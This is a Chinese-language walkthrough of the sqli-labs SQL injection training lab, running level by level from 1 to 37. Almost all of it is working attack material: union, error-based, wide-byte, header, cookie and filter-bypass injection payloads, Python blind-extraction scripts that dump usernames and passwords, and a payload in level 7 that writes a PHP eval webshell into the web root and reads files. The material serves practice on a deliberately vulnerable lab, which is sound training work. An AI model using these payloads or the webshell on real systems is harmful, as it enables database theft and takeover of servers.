一、前言
-
虽然之前刚开始学的时候已经打过一遍,但当时可能懵懵懂懂,现在回过头来再过一遍。
-
用 Linux 虚拟机里的 docker 一键部署,然后访问虚拟机 IP 的 80 端口即可。
docker search sqli-labs 搜索镜像
docker pull acgpiano/sqli-labs 拉取镜像
docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs 运行镜像。
-
建议都用手敲一遍,熟悉相关函数和指令。本文可能不会详细分析,只写 payload,但如果有不懂的或有什么问题,直接留言即可,我会尽快回复。
二、正文
less-1
-
无过滤单引号闭合。
?id=0' union select 1,2,database()--+ 查看数据库 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-2
-
变量为整数型,同上。
?id=0 union select 1,2,database()--+ 查看数据库 ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-3
-
同less-1,只不过闭合方式多了个括号。
?id=0') union select 1,2,database()--+ 查看数据库 ?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0') union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-4
-
同less-3,只不过单引号变双引号。
?id=0") union select 1,2,database()--+ 查看数据库 ?id=0") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=0") union select 1,2,group_concat(username,0x3e,password) from users --+ 查看内容
less-5
-
其实这里也可以用布尔盲注,但既然有报错回显,还是用报错注入。
?id=0' and extractvalue(1,concat(1,(select database())))--+ 查看数据库 ?id=0' and extractvalue(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+ 查看表 ?id=0' and extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')))--+ 查看字段 ?id=0' and extractvalue(1,substring(concat(1,(select group_concat(username,0x3e,password) from users)),1,32))--+ 查看内容
-
同理
?id=0' and updatexml(1,concat(1,(select database())),1)--+ ?id=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表 ?id=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+ ?id=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容
less-6
-
同less-5,只不过单引号变双引号,试试floor函数报错。
?id=0" union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x)a--+ 查看数据库 ?id=0" union select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+ 查看表 ?id=0" union select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+ 查看字段 ?id=0" union select 1 from (select count(*),concat((select password from users limit 11,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+ 查看内容
-
还有exp报错。
?id=0" and exp(~(select * from(select database())a));--+ 查看数据库 ?id=0" and exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a));--+ 查看表 ?id=0" and exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name='users')a));--+ 查看字段 ?id=0" and exp(~(select * from(select group_concat(username,0x3e,password) from users)a));--+ 查看内容
-
还有下面的也都可以
?id=0" and geometrycollection((select * from(select * from(select database())a)b))--+ ?id=0" and multipoint((select * from(select * from(select database())a)b))--+ ?id=0" and polygon((select * from(select * from(select database())a)b))--+ ?id=0" and multipolygon((select * from(select * from(select database())a)b))--+ ?id=0" and linestring((select * from(select * from(select database())a)b))--+ ?id=0" and multilinestring((select * from(select * from(select database())a)b))--+
less-7
-
可以写一句话木马。然后用蚁剑连接就行。
?id=1')) union select 1,"<?php @eval($_GET['cmd']); ?>",3 into outfile "/var/www/html/1.php" --+
-
对应的如果有回显可以读取文件
?id=0' union select 1,2,load_file('/flag')--+
less-8
- 布尔盲注
# Boolean-based blind extraction script for sqli-labs Less-8.
# Less-8 never echoes query results, so each request asks one yes/no question
# ("is the ASCII code of character i greater than mid?") and reads the answer
# from whether a marker string appears in the response body.
import requests

# Injection point: id is closed with a single quote and the probe is OR'd in.
url = "http://192.168.0.4:84/Less-8/?id=0'||"
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Alternative probes for the other enumeration steps (database name,
        # table names, column names); swap one in by uncommenting it.
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,1,0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,1,0)--+'%(i,mid)
        # No timeout is set, so a stalled server blocks the loop indefinitely.
        r = requests.get(url + payload)
        # NOTE(review): the marker below looks like a placeholder; it should be
        # a string that only the "condition true" page contains — confirm.
        if "..........." in r.text:
            head = mid + 1  # condition true: character code > mid
        else:
            tail = mid  # condition false: character code <= mid
    # head only stays at the lower bound 32 when every probe answered false;
    # the script takes that as "no character at position i", i.e. end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-9
- 时间盲注
# Time-based blind extraction script for sqli-labs Less-9.
# Less-9 renders the same page whatever the query returns, so the only
# observable is response time: the probe calls sleep(2) when its condition
# holds, and the client-side 1 s timeout turns that delay into an exception.
import requests

# Injection point: id is closed with a single quote and the probe is OR'd in.
url = "http://192.168.0.4:84/Less-9/?id=0'||"
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Alternative probes for the other enumeration steps (database name,
        # table names, column names); swap one in by uncommenting it.
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            # timeout=1 is deliberately shorter than the payload's sleep(2),
            # so a true condition surfaces as a timeout exception.
            r = requests.get(url + payload, timeout=1)
            tail = mid  # answered quickly: condition false, character code <= mid
        except Exception as e:
            # Any exception lands here, not only the read timeout: a connection
            # error would likewise be read as "condition true".
            head = mid + 1  # character code > mid
    # head only stays at the lower bound 32 when every probe answered false;
    # the script takes that as "no character at position i", i.e. end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-10
- 同上时间盲注,只是将单引号换成双引号。
# Time-based blind extraction script for sqli-labs Less-10.
# Same oracle as the Less-9 script (sleep(2) in the probe versus a 1 s client
# timeout); the only difference is that id is closed with a double quote.
import requests

url = 'http://192.168.0.4:84/Less-10/?id=0"||'
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Alternative probes for the other enumeration steps; uncomment to use.
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            # A fast answer means the condition was false (no sleep).
            r = requests.get(url + payload, timeout=1)
            tail = mid  # character code <= mid
        except Exception as e:
            # Timeout (or any other exception) is taken as "condition true".
            head = mid + 1  # character code > mid
    # head stays at 32 only when every probe answered false: end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-11
-
最简单的POST联合注入,可以用浏览器插件HackBar。
uname=0' union select 1,database()--+&passwd=1 查看数据库 uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&passwd=1 查看表 uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&passwd=1 查看字段 uname=0' union select 1,group_concat(username,0x3e,password) from users--+&passwd=1 查看内容
less-12
-
同less-11,改变了闭合方式。
uname=0") union select 1,database()--+&passwd=1 查看数据库 uname=0") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&passwd=1 查看表 uname=0") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&passwd=1 查看字段 uname=0") union select 1,group_concat(username,0x3e,password) from users--+&passwd=1 查看内容
less-13
-
有报错回显,选择报错注入。
uname=0') and updatexml(1,concat(1,database()),2)--+&passwd=1 查看数据库 uname=0') and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+&passwd=1 查看表 uname=0') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+&passwd=1 查看字段 uname=0') and updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),32,64)),2)--+&passwd=1 查看内容
less-14
-
有报错回显,选择报错注入。
uname=0" and updatexml(1,concat(1,database()),2)--+&passwd=1 查看数据库 uname=0" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+&passwd=1 查看表 uname=0" and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+&passwd=1 查看字段 uname=0" and updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),32,64)),2)--+&passwd=1 查看内容
less-15
- POST型时间盲注。
# Time-based blind extraction script for sqli-labs Less-15 (POST login form).
# The probe goes into the uname field; when its condition holds the query
# calls sleep(3), which the 2 s client timeout turns into an exception.
import requests

url = "http://192.168.3.39:84/Less-15/"
result = ""
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Four form bodies are built for the four enumeration steps, but only
        # data_value is actually posted below; change the post() call to use
        # one of the others when enumerating database/table/column names.
        # The SQL comment marker here is '#' rather than '--+'.
        data_database= {
            'uname': """admin' and if(ascii(substr(database(),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }
        data_table= {
            'uname': """admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }
        data_column= {
            'uname': """admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }
        data_value= {
            'uname': """admin' and if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(3),1)#"""%(i,mid),
            'passwd':'0'
        }
        try:
            # timeout=2 is shorter than sleep(3): a true condition times out.
            r = requests.post(url, data=data_value, timeout=2)
            tail = mid  # answered quickly: character code <= mid
        except Exception as e:
            # Any exception, not only the timeout, is read as "condition true".
            head = mid + 1  # character code > mid
    # head stays at 32 only when every probe answered false: end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-16
- 同less-15,将单引号换为了双引号和括号,可以试试布尔盲注。
# Boolean-based blind extraction script for sqli-labs Less-16 (POST login form).
# uname is closed with a double quote plus parenthesis; the probe is OR'd in
# and the answer is read from whether "flag.jpg" appears in the response.
import requests

url = "http://192.168.3.39:84/Less-16/"
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Four form bodies for the four enumeration steps; only data_value is
        # posted below, the others are kept to swap in when needed.
        data_database= {
            'uname': """0")||if(ascii(substr(database(),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        data_table= {
            'uname': """0")||if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        data_column= {
            'uname': """0")||if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        data_value= {
            'uname': """0")||if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,1,0)#"""%(i,mid),
            'passwd':'0'
        }
        # No timeout is set, so a stalled server blocks the loop indefinitely.
        r = requests.post(url=url,data=data_value)
        # The "login succeeded" page (which references flag.jpg) is only
        # rendered when the OR'd probe evaluates to true.
        if "flag.jpg" in r.text:
            head = mid + 1  # character code > mid
        else:
            tail = mid  # character code <= mid
    # head stays at 32 only when every probe answered false: end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-17
-
对uname有转义处理,所以注入点为passwd;同时最后一步无法直接查看内容,需要嵌套一层子查询。
uname=admin&passwd=1' and updatexml(1,concat(1,database()),2)--+ 查看数据库 uname=admin&passwd=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+ 查看表 uname=admin&passwd=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),2)--+ 查看字段 uname=admin&passwd=1' and updatexml(1,concat(0x3e,(select password from (select password from users limit 3,1) aaa ),0x3e),1) --+ 查看内容
less-18
-
报错注入,注入点在请求头headers信息中的User-Agent。用burp抓包修改,同时得POST传入uname=admin&passwd=admin。
User-Agent:0'||updatexml(1,concat(1,database()),1)--+' 查看数据库 User-Agent:0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+' 查看表 User-Agent:0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+' 查看字段 User-Agent:0'||updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),1,32)),1)--+' 查看内容
less-19
-
报错注入,注入点在请求头headers信息中的Referer,同less-18。
Referer:0'||updatexml(1,concat(1,database()),1)--+' 查看数据库 Referer:0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+' 查看表 Referer:0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+' 查看字段 Referer:0'||updatexml(1,concat(1,substr((select group_concat(username,0x3e,password) from users),1,32)),1)--+' 查看内容
less-20
-
直接联合注入,注入点在请求头headers信息中的cookie。
Cookie: uname=0' union select 1,2,database()--+ 查看数据库 Cookie: uname=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 Cookie: uname=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ 查看字段 Cookie: uname=0' union select 1,2,group_concat(username,0x3e,password) from users--+ 查看内容
less-21
-
联合注入,注入点在请求头headers信息中的cookie,只不过多了一个base64编码处理,闭合方式为单引号加括号。
Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM= 查看数据库 Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSM= 查看表 Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJyM= 查看字段 Cookie: uname=MCcpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4M2UscGFzc3dvcmQpIGZyb20gdXNlcnMj 查看内容
less-22
-
联合注入,注入点在请求头headers信息中的cookie,只不过多了一个base64编码处理,闭合方式为单引号加括号。
Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw== 查看数据库 Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIw== 查看表 Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIw== 查看字段 Cookie: uname=MCIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodXNlcm5hbWUsMHgzZSxwYXNzd29yZCkgZnJvbSB1c2VycyM= 查看内容
less-23
-
联合注入,过滤了注释符,有回显。
?id=0' union select 1,2,database()' 查看数据库 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security 查看表 ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users 查看字段 ?id=0' union select 1,2,group_concat(username,0x3e,password) from users where '1 查看内容
less-24
- 二次注入。利用数据在存储和读取时处理方式的差异来造成注入效果。
- 先注册
admin'#
用户,再修改密码,退出再以修改后的密码来登录admin
用户。
less-25
-
过滤了 or、and,直接联合注入也行,或者用 ||、&& 代替,或者双写 oorr、anandd
绕过?id=0' union select 1,2,database()' 查看数据库 ?id=0' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security 查看表 ?id=0' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users 查看字段 ?id=0' union select 1,2,group_concat(username,0x3e,passwoorrd) from users where '1 查看内容
-
或者时间盲注,前面的脚本改改就能用。
# Time-based blind extraction script for sqli-labs Less-25.
# Less-25 strips the keywords "or" and "and", so the probe writes them doubled
# ("oorr", "infoorrmation_schema", "passwoorrd"): the filter removes the inner
# occurrence once and the intended keyword remains.
import requests

# Injection point: id closed with a single quote, probe joined with "oorr".
url = 'http://192.168.3.39:84/Less-25/?id=0\' oorr '
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Alternative probes for the other enumeration steps; uncomment to use.
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,passwoorrd) from users),%d,1))>%d,sleep(3),0)--+'%(i,mid)
        try:
            # timeout=1 is shorter than the payload's sleep(3): a true
            # condition surfaces as a timeout exception.
            r = requests.get(url + payload, timeout=1)
            tail = mid  # answered quickly: character code <= mid
        except Exception as e:
            # Any exception, not only the timeout, is read as "condition true".
            head = mid + 1  # character code > mid
    # head stays at 32 only when every probe answered false: end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-25a
-
同上
?id=0 union select 1,2,database()--+ 查看数据库 ?id=0 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+ 查看表 ?id=0 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'--+ 查看字段 ?id=0 union select 1,2,group_concat(username,0x3e,passwoorrd) from users --+ 查看内容
-
或者时间盲注,前面的脚本改改就能用。
# Time-based blind extraction script for sqli-labs Less-25a.
# Same keyword filter as Less-25 (doubled "oorr"/"passwoorrd" survive it), but
# id is numeric, so there is no quote to close.
import requests

url = 'http://192.168.3.39:84/Less-25a/?id=0 oorr '
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Alternative probes for the other enumeration steps; uncomment to use.
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,passwoorrd) from users),%d,1))>%d,sleep(3),0)--+'%(i,mid)
        try:
            # timeout=1 versus sleep(3): a true condition times out.
            r = requests.get(url + payload, timeout=1)
            tail = mid  # character code <= mid
        except Exception as e:
            # Any exception, not only the timeout, is read as "condition true".
            head = mid + 1  # character code > mid
    # head stays at 32 only when every probe answered false: end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-26
-
过滤了空格、注释符和 or
,可以用括号风格和引号闭合,和双写绕过。?id=0'||updatexml(1,concat(1,database()),1)||'0 查看数据库 ?id=0'||updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))),1)||'0。 查看表 ?id=0'||updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users'))),1)||'0 查看字段 ?id=0'||updatexml(1,concat(1,(substr((select(group_concat(username,0x3e,passwoorrd))from(users)),1,32))),1)||'0 查看内容
less-26a
- 同上,可以用布尔盲注
# Boolean-based blind extraction script for sqli-labs Less-26a.
# Less-26a strips spaces, comment markers and "or", so the probe uses
# parentheses instead of spaces, doubled keywords ("infoorrmation_schema",
# "passwoorrd"), and closes the statement with a trailing ||('0 instead of a
# comment. The answer is read from whether "Dumb" appears in the response.
import requests

# Injection point: id is closed with a single quote plus parenthesis.
url = "http://192.168.3.39:84/Less-26a/?id=0')||"
result = ''
i = 0  # 1-based position of the character currently being recovered
while True:
    i = i + 1
    # Binary search over the printable ASCII range [32, 127).
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Alternative probes for the other enumeration steps; uncomment to use.
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)||(\'0'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name="users")),%d,1))>%d,1,0)||(\'0'%(i,mid)
        payload = 'if(ascii(substr((select(group_concat(username,0x3e,passwoorrd))from(users)),%d,1))>%d,1,0)||(\'0'%(i,mid)
        # No timeout is set, so a stalled server blocks the loop indefinitely.
        r = requests.get(url + payload)
        # "Dumb" (a row value from the lab's users table) is only rendered when
        # the OR'd probe evaluates to true.
        if "Dumb" in r.text:
            head = mid + 1  # character code > mid
        else:
            tail = mid  # character code <= mid
    # head stays at 32 only when every probe answered false: end of string.
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
less-27
-
过滤了 union、select
等,大写绕过。?id=0'%0aUNion%0aSElect%0a1,database(),3||'0 查看数据库 ?id=0'%0aUNion%0aSElect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||'0 查看表 ?id=0'%0aUNion%0aSElect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||'0 查看字段 ?id=0'%0aUNion%0aSElect%0a1,(SElect%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||'0 查看字段
less-27a
-
同上,单引号换双引号
?id=0"%0aUNion%0aSElect%0a1,database(),3||"0 查看数据库 ?id=0"%0aUNion%0aSElect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||"0 查看表 ?id=0"%0aUNion%0aSElect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||"0 查看字段 ?id=0"%0aUNion%0aSElect%0a1,(SElect%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||"0 查看字段
less-28
-
过滤了 union select
整体?id=0')%0auniounion%0aselectn%0aselect%0a1,database(),3||('0 查看数据库 ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||('0 查看表 ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||('0 查看字段 ?id=0')%0auniounion %0aselectn%0aselect%0a1,(select%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||('0 查看字段
less-28a
-
同less-28
?id=0')%0auniounion%0aselectn%0aselect%0a1,database(),3||('0 查看数据库 ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()||('0 查看表 ?id=0')%0auniounion%0aselectn%0aselect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users'||('0 查看字段 ?id=0')%0auniounion%0aselectn%0aselect%0a1,(select%0agroup_concat(username,0x3e,password)%0afrom%0ausers),1||('0 查看字段
less-29
-
不同 Web 服务器对同名重复参数的解析规则不同。
?id=1&id=-1' union select 1,2,database() --+ 查看数据库 ?id=1&id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=1&id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=1&id=-1' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-30
-
同less-29。
?id=1&id=-1" union select 1,2,database() --+ 查看数据库 ?id=1&id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=1&id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=1&id=-1" union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-31
-
同less-29。
?id=1&id=-1") union select 1,2,database() --+ 查看数据库 ?id=1&id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=1&id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=1&id=-1") union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-32
-
用addslashes()转义,宽字节注入绕过。
?id=-1%bb' union select 1,2,database() --+ 查看数据库 ?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-33
-
同less-32。
?id=-1%bb' union select 1,2,database() --+ 查看数据库 ?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-34
-
同宽字节注入,用burp抓包修改。
uname=a%bb' union select 1,database()#&passwd=1&submit=Submit 查看数据库 uname=a%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit 查看表 uname=a%bb' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&passwd=1&submit=Submit 查看字段 uname=a%bb' union select 1,group_concat(username,0x3e,password) from users#&passwd=1&submit=Submit 查看字段
less-35
-
整数型
?id=0 union select 1,2,database()--+ 查看数据库 ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ 查看表 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+ 查看字段 ?id=0 union select 1,2,group_concat(username,0x3e,password) from users--+ 查看字段
less-36
-
同less-32。
?id=-1%bb' union select 1,2,database() --+ 查看数据库 ?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ 查看表 ?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看字段 ?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+ 查看字段
less-37
-
同宽字节注入,用burp抓包修改。
uname=a%bb' union select 1,database()#&passwd=1&submit=Submit 查看数据库 uname=a%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit 查看表 uname=a%bb' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&passwd=1&submit=Submit 查看字段 uname=a%bb' union select 1,group_concat(username,0x3e,password) from users#&passwd=1&submit=Submit 查看字段
less-38
-
